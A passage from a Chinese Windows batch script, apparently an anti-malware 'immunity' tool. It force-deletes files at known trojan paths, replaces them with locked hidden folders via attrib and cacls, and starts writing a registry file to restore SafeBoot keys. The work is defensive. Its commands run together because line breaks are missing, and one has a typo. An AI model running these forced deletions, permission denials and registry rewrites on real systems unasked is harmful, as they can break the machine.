Explorer\\PLUGINS\\SystemKb.sys\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%programfiles%\\Internet Explorer\\PLUGINS\\system2.jmp\" del /f/s/q \"%programfiles%\\Internet Explorer\\PLUGINS\\system2.jmp\">nul 2>nulmd \"%programfiles%\\Internet Explorer\\PLUGINS\\system2.jmp\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\"md \"%programfiles%\\Internet Explorer\\PLUGINS\\system2.jmp\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\\病毒免疫..\\\"attrib \"%programfiles%\\Internet Explorer\\PLUGINS\\system2.jmp\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" +S +R +Hcacls \"%programfiles%\\Internet Explorer\\PLUGINS\\system2.jmp\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%WINDOWS%\\intrenat.exe\" del /f/s/q \"%WINDOWS%\\intrenat.exe\">nul 2>nulmd \"%WINDOWS%\\intrenat.exe\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\"md \"%WINDOWS%\\intrenat.exe\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\\病毒免疫..\\\"attrib \"%WINDOWS%\\intrenat.exe\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" +S +R +Hcacls \"%WINDOWS%\\intrenat.exe\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%SYSTEM%\\WinSocks.dll\" del /f/s/q \"%SYSTEM%\\WinSocks.dll\">nul 2>nulmd \"%SYSTEM%\\WinSocks.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\"md \"%SYSTEM%\\WinSocks.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\\病毒免疫..\\\"attrib \"%SYSTEM%\\WinSocks.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" +S +R +Hcacls \"%SYSTEM%\\WinSocks.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%WINDOWS%\\exp1orer.dll\" del /f/s/q \"%WINDOWS%\\exp1orer.dll\">nul 2>nulmd \"%WINDOWS%\\exp1orer.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\"md \"%WINDOWS%\\exp1orer.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\\病毒免疫..\\\"attrib \"%WINDOWS%\\exp1orer.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" +S +R +Hcacls \"%WINDOWS%\\exp1orer.dll\\病毒免疫（Trojan-PSW.Win32.QQPass.vm病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1::超级木马下载器病毒Gameservet.exeif exist \"%temp%\\RAVWM.exe\" dle /f/s/q \"%temp%\\RAVWM.exe\">nul 2>nulmd \"%temp%\\RAVWM.exe\\病毒免疫（超级木马下载器病毒）\"md \"%temp%\\RAVWM.exe\\病毒免疫（超级木马下载器病毒）\\病毒免疫..\\\"attrib \"%temp%\\RAVWM.exe\\病毒免疫（超级木马下载器病毒）\" +S +R +Hcacls \"%temp%\\RAVWM.exe\\病毒免疫（超级木马下载器病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%temp%\\qjso.exe\" del /f/s/q \"%temp%\\qjso.exe\">nul 2>nulmd \"%temp%\\qjso.exe\\病毒免疫（超级木马下载器病毒）\"md \"%temp%\\qjso.exe\\病毒免疫（超级木马下载器病毒）\\病毒免疫..\\\"attrib \"%temp%\\qjso.exe\\病毒免疫（超级木马下载器病毒）\" +S +R +Hcacls \"%temp%\\qjso.exe\\病毒免疫（超级木马下载器病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%systemroot%\\system32\\8888-521ww.exe\" del /f/s/q \"%systemroot%\\system32\\8888-521ww.exe\">nul 2>nulmd \"%systemroot%\\system32\\8888-521ww.exe\\病毒免疫（超级木马下载器病毒）\"md \"%systemroot%\\system32\\8888-521ww.exe\\病毒免疫（超级木马下载器病毒）\\病毒免疫..\\\"attrib \"%systemroot%\\system32\\8888-521ww.exe\\病毒免疫（超级木马下载器病毒）\" +S +R +Hcacls \"%systemroot%\\system32\\8888-521ww.exe\\病毒免疫（超级木马下载器病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1for /l %%i in (0,1,9) do (    if exist \"%systemroot%\\system32\\game%%i.exe\" del /f/s/q \"%systemroot%\\system32\\game%%i.exe\">nul 2>nul    md \"%systemroot%\\system32\\game%%i.exe\\病毒免疫（超级木马下载器病毒）\"    md \"%systemroot%\\system32\\game%%i.exe\\病毒免疫（超级木马下载器病毒）\\病毒免疫..\\\"    attrib \"%systemroot%\\system32\\game%%i.exe\\病毒免疫（超级木马下载器病毒）\" +S +R +H    cacls \"%systemroot%\\system32\\game%%i.exe\\病毒免疫（超级木马下载器病毒）\" /d everyone /e>nul 2>nul    set /a NO.+=1)if exist \"%systemroot%\\system32\\nwizqqfo.dll\" del /f/s/q \"%systemroot%\\system32\\nwizqqfo.dll\">nul 2>nulmd \"%systemroot%\\system32\\nwizqqfo.dll\\病毒免疫（超级木马下载器病毒）\"md \"%systemroot%\\system32\\nwizqqfo.dll\\病毒免疫（超级木马下载器病毒）\\病毒免疫..\\\"attrib \"%systemroot%\\system32\\nwizqqfo.dll\\病毒免疫（超级木马下载器病毒）\" +S +R +Hcacls \"%systemroot%\\system32\\nwizqqfo.dll\\病毒免疫（超级木马下载器病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1if exist \"%systemroot%\\system32\\gameservet.exe\" del /f/s/q \"%systemroot%\\system32\\gameservet.exe\">nul 2>nulmd \"%systemroot%\\system32\\gameservet.exe\\病毒免疫（超级木马下载器病毒）\"md \"%systemroot%\\system32\\gameservet.exe\\病毒免疫（超级木马下载器病毒）\\病毒免疫..\\\"attrib \"%systemroot%\\system32\\gameservet.exe\\病毒免疫（超级木马下载器病毒）\" +S +R +Hcacls \"%systemroot%\\system32\\gameservet.exe\\病毒免疫（超级木马下载器病毒）\" /d everyone /e>nul 2>nulset /a NO.+=1::Trojan/Win32.IEprot.jdo病毒for /l %%i in (0,1,9) do (    if exist \"%temp%\\[%%i].gif\" del /f/s/q \"%temp%\\[%%i].gif\">nul 2>nul    md \"%temp%\\[%%i].gif\\病毒免疫（Trojan/Win32.IEprot病毒）\"    md \"%temp%\\[%%i].gif\\病毒免疫（Trojan/Win32.IEprot病毒）\\病毒免疫..\\\"    attrib \"%temp%\\[%%i].gif\\病毒免疫（Trojan/Win32.IEprot病毒）\" +S +R +H    cacls \"%temp%\\[%%i].gif\\病毒免疫（Trojan/Win32.IEprot病毒）\" /d everyone /e>nul 2>nul    set /a NO.+=1)::Backdoor.Win32.Agent.ahj for /l %%i in (0,1,9) do (    if exist \"%temp%\\db_%%i.exe\" del /f /s/q \"%temp%\\db_%%i.exe\"    md \"%temp%\\db_%%i.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\"    md \"%temp%\\db_%%i.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\\病毒免疫..\\\"    attrib \"%temp%\\db_%%i.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" +S +R +H    cacls \"%temp%\\db_%%i.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" /d everyone /e    set /a NO.+=1)if exist \"%system32%\\92219FBE.DLL\" del /f /s/q \"%system32%\\92219FBE.DLL\"md \"%system32%\\92219FBE.DLL\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\"md \"%system32%\\92219FBE.DLL\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\\病毒免疫..\\\"attrib \"%system32%\\92219FBE.DLL\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" +S +R +Hcacls \"%system32%\\92219FBE.DLL\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" /d everyone /eset /a NO.+=1if exist \"%system32%\\92219FBE.exe\" del /f /s/q \"%system32%\\92219FBE.exe\"md \"%system32%\\92219FBE.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\"md \"%system32%\\92219FBE.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\\病毒免疫..\\\"attrib \"%system32%\\92219FBE.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" +S +R +Hcacls \"%system32%\\92219FBE.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" /d everyone /eset /a NO.+=1if exist \"%system32%\\92219FBET.exe\" del /f /s/q \"%system32%\\92219FBET.exe\"md \"%system32%\\92219FBET.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\"md \"%system32%\\92219FBET.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\\病毒免疫..\\\"attrib \"%system32%\\92219FBET.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" +S +R +Hcacls \"%system32%\\92219FBET.exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" /d everyone /eset /a NO.+=1for /l %%i in (0,1,9) do (    if exist \"%HOMEPATH%\\Local Settings\\Temporary Internet Files\\Content.IE5\\CHUFWD67\\i[%%i].exe\" del /f /s/q \"%HOMEPATH%\\Local Settings\\Temporary Internet Files\\Content.IE5\\CHUFWD67\\i[%%i].exe\"    md \"%HOMEPATH%\\Local Settings\\Temporary Internet Files\\Content.IE5\\CHUFWD67\\i[%%i].exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\"    md \"%HOMEPATH%\\Local Settings\\Temporary Internet Files\\Content.IE5\\CHUFWD67\\i[%%i].exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\\病毒免疫..\\\"    attrib \"%HOMEPATH%\\Local Settings\\Temporary Internet Files\\Content.IE5\\CHUFWD67\\i[%%i].exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" +S +R +H    cacls \"%HOMEPATH%\\Local Settings\\Temporary Internet Files\\Content.IE5\\CHUFWD67\\i[%%i].exe\\病毒免疫（Backdoor.Win32.Agent.ahj病毒）\" /d everyone /e    set /a NO.+=1)::恶性U盘病毒if exist \"%Temp%\\testexe.exe\" del /f/s/q \"%Temp%\\testexe.exe\"md \"%Temp%\\testexe.exe\\病毒免疫（恶性U盘病毒）\"md \"%Temp%\\testexe.exe\\病毒免疫（恶性U盘病毒）\\病毒免疫..\\\"attrib \"%Temp%\\testexe.exe\\病毒免疫（恶性U盘病毒）\" +S +R +Hcacls \"%Temp%\\testexe.exe\\病毒免疫（恶性U盘病毒）\" /d everyone /eset /a NO.+=1if exist \"%Temp%\\testexe.dll\" del /f/s/q \"%Temp%\\testexe.dll\"md \"%Temp%\\testexe.dll\\病毒免疫（恶性U盘病毒）\"md \"%Temp%\\testexe.dll\\病毒免疫（恶性U盘病毒）\\病毒免疫..\\\"attrib \"%Temp%\\testexe.dll\\病毒免疫（恶性U盘病毒）\" +S +R +Hcacls \"%Temp%\\testexe.dll\\病毒免疫（恶性U盘病毒）\" /d everyone /eset /a NO.+=1::woso.exeif exist \"%Temp%\\woso.exe\" del /f/s/q \"%Temp%\\woso.exe\"md \"%Temp%\\woso.exe\\病毒免疫（woso.exe病毒）\"md \"%Temp%\\woso.exe\\病毒免疫（woso.exe病毒）\\病毒免疫..\\\"attrib \"%Temp%\\woso.exe\\病毒免疫（woso.exe病毒）\" +S +R +Hcacls \"%Temp%\\woso.exe\\病毒免疫（woso.exe病毒）\" /d everyone /eset /a NO.+=1clsecho.echo = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =echo.echo  统计   共免疫：%NO.% 病毒体echo.echo.echo                                任意键返回主菜单pause>nulgoto _max:Repair_Safemodeclsif exist safe.reg del /f/s/q safe.regecho Windows Registry Editor Version 5.00>>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot]>>safe.regecho \"AlternateShell\"=\"cmd.exe\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal]>>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\AppMgmt]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\Base]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\Boot Bus Extender]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\Boot file system]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\CryptSvc]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\DcomLaunch]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\dmadmin]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\dmboot.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\dmio.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\dmload.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\dmserver]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\EventLog]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\File system]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\Filter]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\HelpSvc]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\Netlogon]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\PCI Configuration]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\PlugPlay]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\PNP Filter]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\Primary disk]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\RpcSs]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SCSI Class]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\sermouse.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\sr.sys]>>safe.regecho @=\"FSFilter System Recovery\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\SRService]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\System Bus Extender]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\vga.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\vgasave.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\WinMgmt]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{36FC9E60-C465-11CF-8056-444553540000}]>>safe.regecho @=\"Universal Serial Bus controllers\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E965-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"CD-ROM Drive\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"DiskDrive\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E969-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Standard floppy disk controller\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E96A-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Hdc\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E96B-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Keyboard\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E96F-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Mouse\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E977-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"PCMCIA Adapters\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E97B-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"SCSIAdapter\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E97D-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"System\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E980-E325-11CE-BFC1-08002BE10318}]>>safe.regecho @=\"Floppy disk drive\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]>>safe.regecho @=\"Volume\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]>>safe.regecho @=\"Human Interface Devices\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network]>>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\AFD]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\AppMgmt]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Base]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Boot Bus Extender]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Boot file system]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Browser]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\CryptSvc]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\DcomLaunch]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Dhcp]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\dmadmin]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\dmboot.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\dmio.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\dmload.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\dmserver]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\DnsCache]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\EventLog]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\File system]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Filter]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\HelpSvc]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\ip6fw.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\ipnat.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\LanmanServer]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\LanmanWorkstation]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\LmHosts]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Messenger]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NDIS]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NDIS Wrapper]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Ndisuio]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NetBIOS]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NetBIOSGroup]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NetBT]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NetDDEGroup]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Netlogon]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NetMan]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Network]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NetworkProvider]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\NtLmSsp]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\PCI Configuration]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\PlugPlay]>>safe.regecho @=\"Service\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\PNP Filter]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\PNP_TDI]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Primary disk]>>safe.regecho @=\"Driver Group\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\rdpcdd.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\rdpdd.sys]>>safe.regecho @=\"Driver\">>safe.regecho.>>safe.reg&&echo 